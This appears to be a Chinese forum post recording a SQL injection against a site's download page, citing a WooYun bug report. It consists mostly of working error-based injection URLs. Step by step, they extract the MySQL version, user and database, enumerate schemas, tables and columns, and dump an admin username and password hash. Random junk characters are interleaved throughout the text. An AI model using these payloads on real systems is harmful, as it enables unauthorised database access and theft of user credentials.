http://www.wooyun.org/bugs/wooyun-2010-01666( `. J4 j5 \% ?' [$ o
, E* x& [4 K. ]( l3 J之前想找个测试 没想到这有 可以测试下做个记录而已 , ` P/ \$ c: g, j# X
5 S! L7 a! d" {: [& q7 F9 }
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0033 c, ^7 S7 R2 ?) Q2 w! M& x
" a( [5 W7 X. P1 D* O. {2 `
/data0/htdocs/leqi_new/app/myapp.php' v% j- m( w9 p; r* Y8 `
- k* Q7 y% b0 o' L) X
或者4 V7 @# r" ^0 N! B& f4 T! l5 j
# k7 ^, X: _0 b6 ?, t: q3 C/**********version()**********/ 5.1.49-log
# r o* [4 V3 \/ X8 P* k: shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 y5 p7 Z7 ]8 D2 H4 _, k! t' w# W! w q. L
/**********user()**********/
8 U- U' _# \; N ~http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* r6 X8 S1 _' Y
* w; h/ a& N8 f0 ^0 x3 N8 A/**********database()**********/ leqi1 t8 O2 Q% _9 z+ K: o ^$ U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 \( ^5 a( ~, t( K4 j; V
L# T; @3 d: n! r7 |; Q0 f: ?" h/**********limit依次递归爆库**********/
& ?: M( | l2 r" d# ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. [5 b# G9 p4 n% u. \
information_schema
* S+ i7 w$ ~& M, i: h8 u8 ]" v+ ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! |0 P* g4 b0 P j+ F
leqi2 J2 m3 y# \& |" J! z2 W7 N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 ?' l8 @4 [5 M3 Qtest
3 O6 \% i \9 x2 ]# _
5 y' F4 \+ ^9 w t( ~/**********limit依次递归爆表名**********/! `! t+ y0 G( H. R3 }# X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ e( I' D# s5 K* I! e* Y( s/ Dusers4 [# [8 z4 z9 X1 u- t8 N- }' w
3 D- h+ i3 p, U+ t/**********limit依次递归爆字段名**********// P( x0 [6 Y5 C- b, a9 h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, d5 \9 B) f+ G9 g/ ^+ k/ Nuser_id,username,nickname,passwd,group_id1 @. N o ?' a C+ A+ \' C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 y4 b- H$ |! q
/wapc/5000_0005_003
) H; [- w0 [( P6 J11 219 {. a) n% P7 M4 o1 I6 N# h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
1 ?+ _$ p4 o! B: K/wapc/5000_0005_003
, e9 h# `* V- w& m6 E# u11 341 351 3615 M1 ^9 F4 J% S* B( }: E' [ B; s0 h$ @
/**********爆数据**********/" s$ ]6 G8 `" K$ v6 W3 @5 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
2 b& v$ r" Y( O4 }1 Q$ O/ @; ~admin
/ U! X: z1 b. ~5 F) _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 N' \7 z8 v$ n$ g' Y/ N: J
6a8b4574ca231eb8bd52764d4978ffcd
l& V' A, n% M: I7 W1 _6 U6 g
. W5 q7 {: m( t3 |- C
& ]- W, ?! v( A$ o |